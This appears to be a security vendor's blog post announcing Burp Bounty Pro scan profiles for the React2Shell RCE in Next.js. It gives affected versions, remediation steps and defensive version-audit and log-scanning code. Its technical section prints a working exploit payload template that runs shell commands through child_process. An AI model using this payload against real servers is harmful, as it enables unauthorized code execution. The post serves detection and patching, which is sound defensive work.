CVE-2025-55182 (React2Shell): New Detection Profiles for Burp Bounty Pro
Executive Summary
We have released three new detection profiles for CVE-2025-55182, a critical Remote Code Execution vulnerability affecting React Server Components and Next.js applications. With a CVSS score of 10.0 and active exploitation in the wild, this vulnerability poses an immediate threat to millions of web applications worldwide.
🔄 How to Get These Profiles
- Open Burp Suite
- Go to Extensions → Burp Bounty Pro
- Navigate to the About tab
- Click "Check For Updates"
The new profiles will be downloaded and imported automatically.
What is React2Shell?
CVE-2025-55182, dubbed "React2Shell" by security researchers, is an unsafe deserialization vulnerability in the React Server Components (RSC) Flight protocol. Discovered by Lachlan Davidson from Assetnote on December 3, 2025, this vulnerability allows unauthenticated attackers to achieve remote code execution on affected servers.
Key Facts
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-55182 |
| CVSS Score | 10.0 (Critical) |
| CWE | CWE-502 (Deserialization of Untrusted Data) |
| CISA KEV | Added December 5, 2025 |
| Remediation Deadline | December 19, 2025 |
| Authentication Required | None |
| Exploit Complexity | Low |
Affected Versions
❌ Vulnerable
- React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Next.js: 15.0.4 through 16.0.6
✅ Patched
- React: 19.0.1, 19.1.2, 19.2.1
- Next.js: 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
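To make the version lists above actionable during triage, here is an added example (not part of the original post or of Burp Bounty Pro) that audits a package-lock.json fragment against exactly the React and Next.js versions stated on this page; the assumption that each fixed Next.js release covers its own major.minor branch is mine, and the sample lockfile is constructed.

```python
# Audit React / Next.js versions against the CVE-2025-55182 ranges listed
# above (added example, not part of the original post).
import json
import re

# Version data exactly as stated on the page.
REACT_VULNERABLE = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}
REACT_PATCHED = {"19.0.1", "19.1.2", "19.2.1"}
NEXT_VULN_RANGE = ("15.0.4", "16.0.6")  # inclusive
NEXT_PATCHED = ["15.1.9", "15.2.6", "15.3.6", "15.4.8", "15.5.7", "16.0.7"]

def parse(v):
    """'^19.2.1-canary' -> (19, 2, 1); range prefixes and suffixes are dropped."""
    core = re.match(r"\d+(?:\.\d+){0,2}", v.strip().lstrip("^~>=<v")).group(0)
    parts = [int(p) for p in core.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))

def react_status(version):
    v = parse(version)
    if v in {parse(p) for p in REACT_PATCHED}:
        return "patched"
    return "vulnerable" if v in {parse(p) for p in REACT_VULNERABLE} else "not listed"

def next_status(version):
    v = parse(version)
    # Assumption: each fixed release on the page covers its own major.minor
    # branch, so anything at or above that fix on the same branch is patched.
    for fix in NEXT_PATCHED:
        f = parse(fix)
        if v[:2] == f[:2]:
            return "patched" if v >= f else "vulnerable"
    if parse(NEXT_VULN_RANGE[0]) <= v <= parse(NEXT_VULN_RANGE[1]):
        return "vulnerable"  # e.g. 15.0.x: no fixed release on that branch
    return "not listed"

def audit_lockfile(lock_json):
    """{package: (version, status)} for react/next in a package-lock.json v2/v3."""
    pkgs = json.loads(lock_json).get("packages", {})
    result = {}
    for name, status in (("react", react_status), ("next", next_status)):
        entry = pkgs.get("node_modules/" + name, {})
        if "version" in entry:
            result[name] = (entry["version"], status(entry["version"]))
    return result

# Constructed sample lockfile fragment (not from any real project).
SAMPLE_LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "node_modules/react": {"version": "19.2.0"},
    "node_modules/next": {"version": "15.3.2"}}})
print(audit_lockfile(SAMPLE_LOCK))
```

A "not listed" result only means the version is outside the ranges this page gives; it is not a clean bill of health.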
Active Exploitation
Within hours of public disclosure, threat actors began actively exploiting this vulnerability. CISA added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog on December 5, 2025.
Observed threat actors include:
- Chinese APT groups (Earth Lamia, Jackpot Panda)
- Cryptomining operations
- Cobalt Strike deployment campaigns
The ease of exploitation (single HTTP request, no authentication) combined with the widespread adoption of Next.js makes this vulnerability particularly dangerous.
Technical Analysis
The Vulnerability
React Server Components use a protocol called "Flight" to serialize and transmit component trees between server and client. The vulnerability exists in how the Flight protocol deserializes incoming data from HTTP requests.
The exploit chain works as follows:
- Attacker sends a POST request with malicious multipart form data
- The payload uses JavaScript prototype pollution via `__proto__` to manipulate object behavior
- The polluted prototype chain allows access to `process.mainModule`
- Code execution is achieved through `require('child_process').execSync()`
Exploit Payload Structure
```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('COMMAND').toString().trim();; throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
```
The exploit abuses the Flight protocol's reference system (`$1:__proto__:then`) to achieve prototype pollution, then leverages JavaScript's prototype chain to gain code execution.
New Burp Bounty Pro Profiles
We have developed three detection profiles to cover different scanning scenarios:
CVE-2025-55182_React2Shell_RCE
Type: Active Scan
Detection Method: Mathematical Proof of Concept
This profile sends a payload that executes `echo $((31337*31337))` on the target server. If vulnerable, the response will contain 982013569 in the `x-action-redirect` header, confirming code execution without causing harm.
Match condition: `x-action-redirect` contains `982013569`
CVE-2025-55182_React2Shell_RCE_OOB
Type: Active Scan + Collaborator
Detection Method: Out-of-Band DNS/HTTP callback
For environments where response-based detection is not possible (WAF filtering, async processing), this profile uses Burp Collaborator to confirm code execution via DNS lookup.
CVE-2025-55182_React2Shell_RCE_Windows
Type: Active Scan
Detection Method: PowerShell Mathematical Proof
For Windows-based Node.js deployments, this profile uses PowerShell to perform the mathematical calculation: `powershell -c "31337*31337"`.
Match condition: `x-action-redirect` contains `982013569`
Scanning Recommendations
Immediate Actions
- Update your profiles using the built-in update mechanism
- Scan all Next.js applications in your scope
- Prioritize internet-facing applications - these are most at risk
- Check for indicators of compromise if vulnerabilities are found
Detection Strategy
We recommend using the profiles in the following order:
- Start with CVE-2025-55182_React2Shell_RCE - fastest detection method
- Use OOB profile if standard detection fails (WAF bypass, blind environments)
- Use Windows profile for Windows Server deployments
These profiles have a very low false positive rate because detection requires exact mathematical results (982013569) or actual Collaborator callbacks. The exploit mechanism is specific to vulnerable React/Flight versions.
Remediation Guidance
If You Discover Vulnerable Applications
- Patch immediately - Update to the fixed versions listed above
- Enable WAF protection:
  - AWS WAF: Enable `AWSManagedRulesKnownBadInputsRuleSet` v1.24+
  - Cloudflare: Protection is auto-enabled
- Monitor for exploitation - Check logs for POST requests with a `Next-Action` header
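One way to act on the monitoring item above, as an added example that is not part of the original post or of the Burp Bounty profiles: it scans JSON access-log records for POST requests carrying a `Next-Action` header and escalates only when the captured body sample contains indicators taken from the payload structure shown earlier. The record shape (method, path, headers map, optional body_sample) is an assumption, and the log lines are constructed.

```python
# Flag possible CVE-2025-55182 exploitation attempts in JSON access logs
# (added example; not part of the original post or the Burp Bounty profiles).
import json

# Request indicators taken from the payload structure shown earlier on the page.
BODY_INDICATORS = ("__proto__", "process.mainModule", "child_process", "$1:constructor")

def classify(entry):
    """Return 'normal', 'review' or 'likely-exploit' for one log record.

    Assumed record shape (constructed for this example): method, path, a
    headers map and an optional body_sample holding the first bytes of the body.
    """
    headers = {k.lower(): v for k, v in entry.get("headers", {}).items()}
    if entry.get("method") != "POST" or "next-action" not in headers:
        return "normal"
    # Next-Action is also sent by legitimate Server Action calls, so the header
    # alone only marks the request for review; the body sample decides.
    body = entry.get("body_sample", "")
    return "likely-exploit" if any(ind in body for ind in BODY_INDICATORS) else "review"

def scan(lines):
    """Return [(line_no, verdict, path)] for every non-normal log line."""
    findings = []
    for n, line in enumerate(lines, 1):
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the whole scan
        verdict = classify(entry)
        if verdict != "normal":
            findings.append((n, verdict, entry.get("path", "?")))
    return findings

# Constructed sample log lines; the third carries a fragment of the page's payload.
SAMPLE_LOG = [
    '{"method":"GET","path":"/","headers":{"User-Agent":"Mozilla/5.0"}}',
    '{"method":"POST","path":"/login","headers":{"Next-Action":"a1b2c3",'
    '"Content-Type":"multipart/form-data"},"body_sample":"0=%7B%22email%22"}',
    '{"method":"POST","path":"/","headers":{"next-action":"a1b2c3",'
    '"Content-Type":"multipart/form-data"},'
    '"body_sample":"{\\"then\\":\\"$1:__proto__:then\\",\\"status\\":\\"resolved_model\\""}',
]

if __name__ == "__main__":
    for n, verdict, path in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict:<14} {path}")
```

The "review" verdict will fire on every Server Action call, so on a busy Next.js site tune it to the paths that actually expose actions and rely on the body indicators for alerting.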
Post-Incident Actions
If exploitation is suspected:
- Rotate all secrets, API keys, and credentials
- Check for web shells and backdoors
- Review server logs for suspicious activity
- Conduct forensic analysis
- Report to your security team
Conclusion
CVE-2025-55182 represents a critical threat to the React/Next.js ecosystem. With active exploitation ongoing and a CISA remediation deadline of December 19, 2025, immediate action is required.
Update your Burp Bounty Pro profiles today and scan your targets before attackers do.
Stay safe. Hack responsibly. 🛡️